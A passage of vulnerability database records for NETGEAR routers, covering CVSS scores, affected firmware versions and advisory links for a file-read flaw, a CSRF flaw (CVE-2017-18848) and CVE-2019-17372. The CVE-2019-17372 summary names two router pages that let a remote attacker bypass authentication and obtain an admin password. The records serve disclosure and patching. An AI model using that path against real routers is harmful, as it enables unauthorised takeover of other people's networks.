"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-24T15:15:12.597",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000053198/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Gateways-PSV-2017-0590"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000053198/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Gateways-PSV-2017-0590"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-20 16:15
Modified
2024-11-21 03:21
Severity ?
Summary
Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.0.36, AC1450 before 1.0.0.36, R7300 before 1.0.0.54, and R8500 before 1.0.2.94.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | ac1450_firmware | * | |
| netgear | ac1450 | - | |
| netgear | r7300_firmware | * | |
| netgear | r7300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E5C8387B-1BB9-49C9-86ED-B86E5DBEC694",
"versionEndExcluding": "1.0.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ac1450_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "95BB1ADE-E6D9-4985-B88F-5FEBBDA9830A",
"versionEndExcluding": "1.0.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E4BA18B2-8234-4C26-B865-741D467C5EBE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D264AB39-63DD-4B32-9A91-D86A3700733D",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58EFB06D-AD59-4F40-B6EC-BD3C1BCACE7A",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.0.36, AC1450 before 1.0.0.36, R7300 before 1.0.0.54, and R8500 before 1.0.2.94."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un ataque de tipo CSRF. Esto afecta a R6300v2 versiones anteriores a 1.0.0.36, AC1450 versiones anteriores a 1.0.0.36, R7300 versiones anteriores a 1.0.0.54, y R8500 versiones anteriores a 1.0.2.94."
}
],
"id": "CVE-2017-18848",
"lastModified": "2024-11-21T03:21:05.050",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-20T16:15:13.930",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-10-09 13:15
Modified
2024-11-21 04:32
Severity ?
Summary
Certain NETGEAR devices allow remote attackers to disable all authentication requirements by visiting genieDisableLanChanged.cgi. The attacker can then, for example, visit MNU_accessPassword_recovered.html to obtain a valid new admin password. This affects AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L, and WNR3500L.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md | Exploit, Third Party Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ac1450_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3AE717E0-B9A2-4A3F-843C-D9A1AEF8D024",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E4BA18B2-8234-4C26-B865-741D467C5EBE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E41AF1C1-1F19-4115-AFCD-532FBEA8E3EC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dc112a_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C5C9E5B5-8E65-4593-9F95-92D5C177489D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dc112a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F87FFC46-137D-45B8-B437-F15565FB33D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jndr3000_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F8B781F1-A82B-4D4B-AEF6-BDBEEE6D6DFF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jndr3000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DEEEEE5-0798-450E-BF9D-B17A15235C80",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:lg2200d_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8D4C2805-BDCA-4ECA-9E4F-B802AECC3E88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:lg2200d:-:*:*:*:*:*:*:*",
"matchCriteriaId": "410EAA8C-48DF-4B61-875A-8F51048E19B4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r4500_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5C461751-BF10-4441-9A2F-10AF054072FB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r4500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FCCD5B9-03F9-42CF-B7A5-27A7239FEDB6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6200_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "58FBF5B0-466A-4D88-941C-F0DDFC87F4BE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8A466B29-3ADA-46D9-824C-8DF9160B7DD7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6200v2_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B7D512D3-2F48-442A-97F8-DA43A22DD010",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6200v2:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B5694D19-2577-41B3-87B8-2B50868EA946",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1ED72E5B-9DCF-4A20-8BF1-810BCD9383E5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8E9E9091-E6F8-4BE5-8B31-6682B2C2CE95",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9597966A-B13C-4098-838B-EC9AA8DE443D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300v2_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2EC1E8B7-43FB-46B3-9329-70F2E31292D1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300v2:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7909744D-FE9B-49D1-ADB3-029CCC432A47",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "08F1474F-34C8-4A04-ABB6-ED3D57A67566",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "766E6051-787B-414E-BF8B-9663686203AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FC4BCACA-BA08-4595-B829-C3D68EC0F353",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8041FCF6-A8DB-494E-8542-80FC3BAB22FC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "18FFC1CE-3238-4E4E-9283-D95C142EEC7B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EDCA79CB-4006-4F08-83DC-3B72A02E2511",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "79B9CF4B-F6F0-4BCF-BC30-09A4D0C3E8A6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0A483635-B300-4D6A-9E1A-CD776A55D48F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7359F6C9-A987-4E51-89C1-81A100CEA4D8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4DE7D9C1-33AA-489D-8A66-E6C456D38929",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "951636C7-B531-4395-A89A-DEAA6AE2093F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CF07E3BB-5FDE-4C79-A893-E6111AED30A5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wgr614v10_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "27BF75F1-13E5-497C-A606-805585BA2CAA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wgr614v10:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6069BE1B-C458-4E51-B704-071BB932F290",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rpv2_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "110E1E63-3225-4692-98C4-34FF145548D8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rpv2:-:*:*:*:*:*:*:*",
"matchCriteriaId": "65FACC9E-3E0E-4416-9280-706F4FCE436A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400v2_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CFD82DF-14C0-4D93-A871-C2E71203D1A7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400v2:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3DB8021-1BC8-4520-A790-C5A3A3ABDA6E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700v3_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "42FE5EE4-15C3-492C-A006-7BED45C28BC4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700v3:-:*:*:*:*:*:*:*",
"matchCriteriaId": "603836E6-E7FF-43C7-A410-8BD9D0950F7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4000_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E706326B-FCB4-4F23-9323-B5E92505ECB1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1C34EC74-D6F1-46F1-B47E-E62793171427",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "48524781-AD79-4EBE-8DA3-48A64A09257D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7E9F459C-B628-402A-AF4A-72E08FE41837",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500v2_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "47F2C4B9-4B82-49B8-ABBC-C6937281EFB9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500v2:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EFB2BF35-952C-4E34-AE59-6D73041EB278",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2CDF6210-D67B-4434-A619-EC3876D4E745",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B6E9507F-EE84-4C27-BF38-CEFAB453339F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000v3_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "51C2FC1C-6D85-49C5-AC9F-E0114A3A0999",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000v3:-:*:*:*:*:*:*:*",
"matchCriteriaId": "252E5C7B-EF02-4374-A43E-02FAA9E697D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9BF3B420-3843-4A62-BC48-50F6A4898D2E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "30A92EDA-46B6-4C2E-AC05-A192FFA90B85",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices allow remote attackers to disable all authentication requirements by visiting genieDisableLanChanged.cgi. The attacker can then, for example, visit MNU_accessPassword_recovered.html to obtain a valid new admin password. This affects AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L, and WNR3500L."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR permiten a atacantes remotos deshabilitar todos los requisitos de autenticaci\u00f3n visitando el archivo genieDisableLanChanged.cgi. El atacante puede, por ejemplo, visitar MNU_accessPassword_recovered.html para obtener una nueva contrase\u00f1a de administrador v\u00e1lida. Esto afecta a AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L y WNR3500L."
}
],
"id": "CVE-2019-17372",
"lastModified": "2024-11-21T04:32:12.360",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-10-09T13:15:16.863",
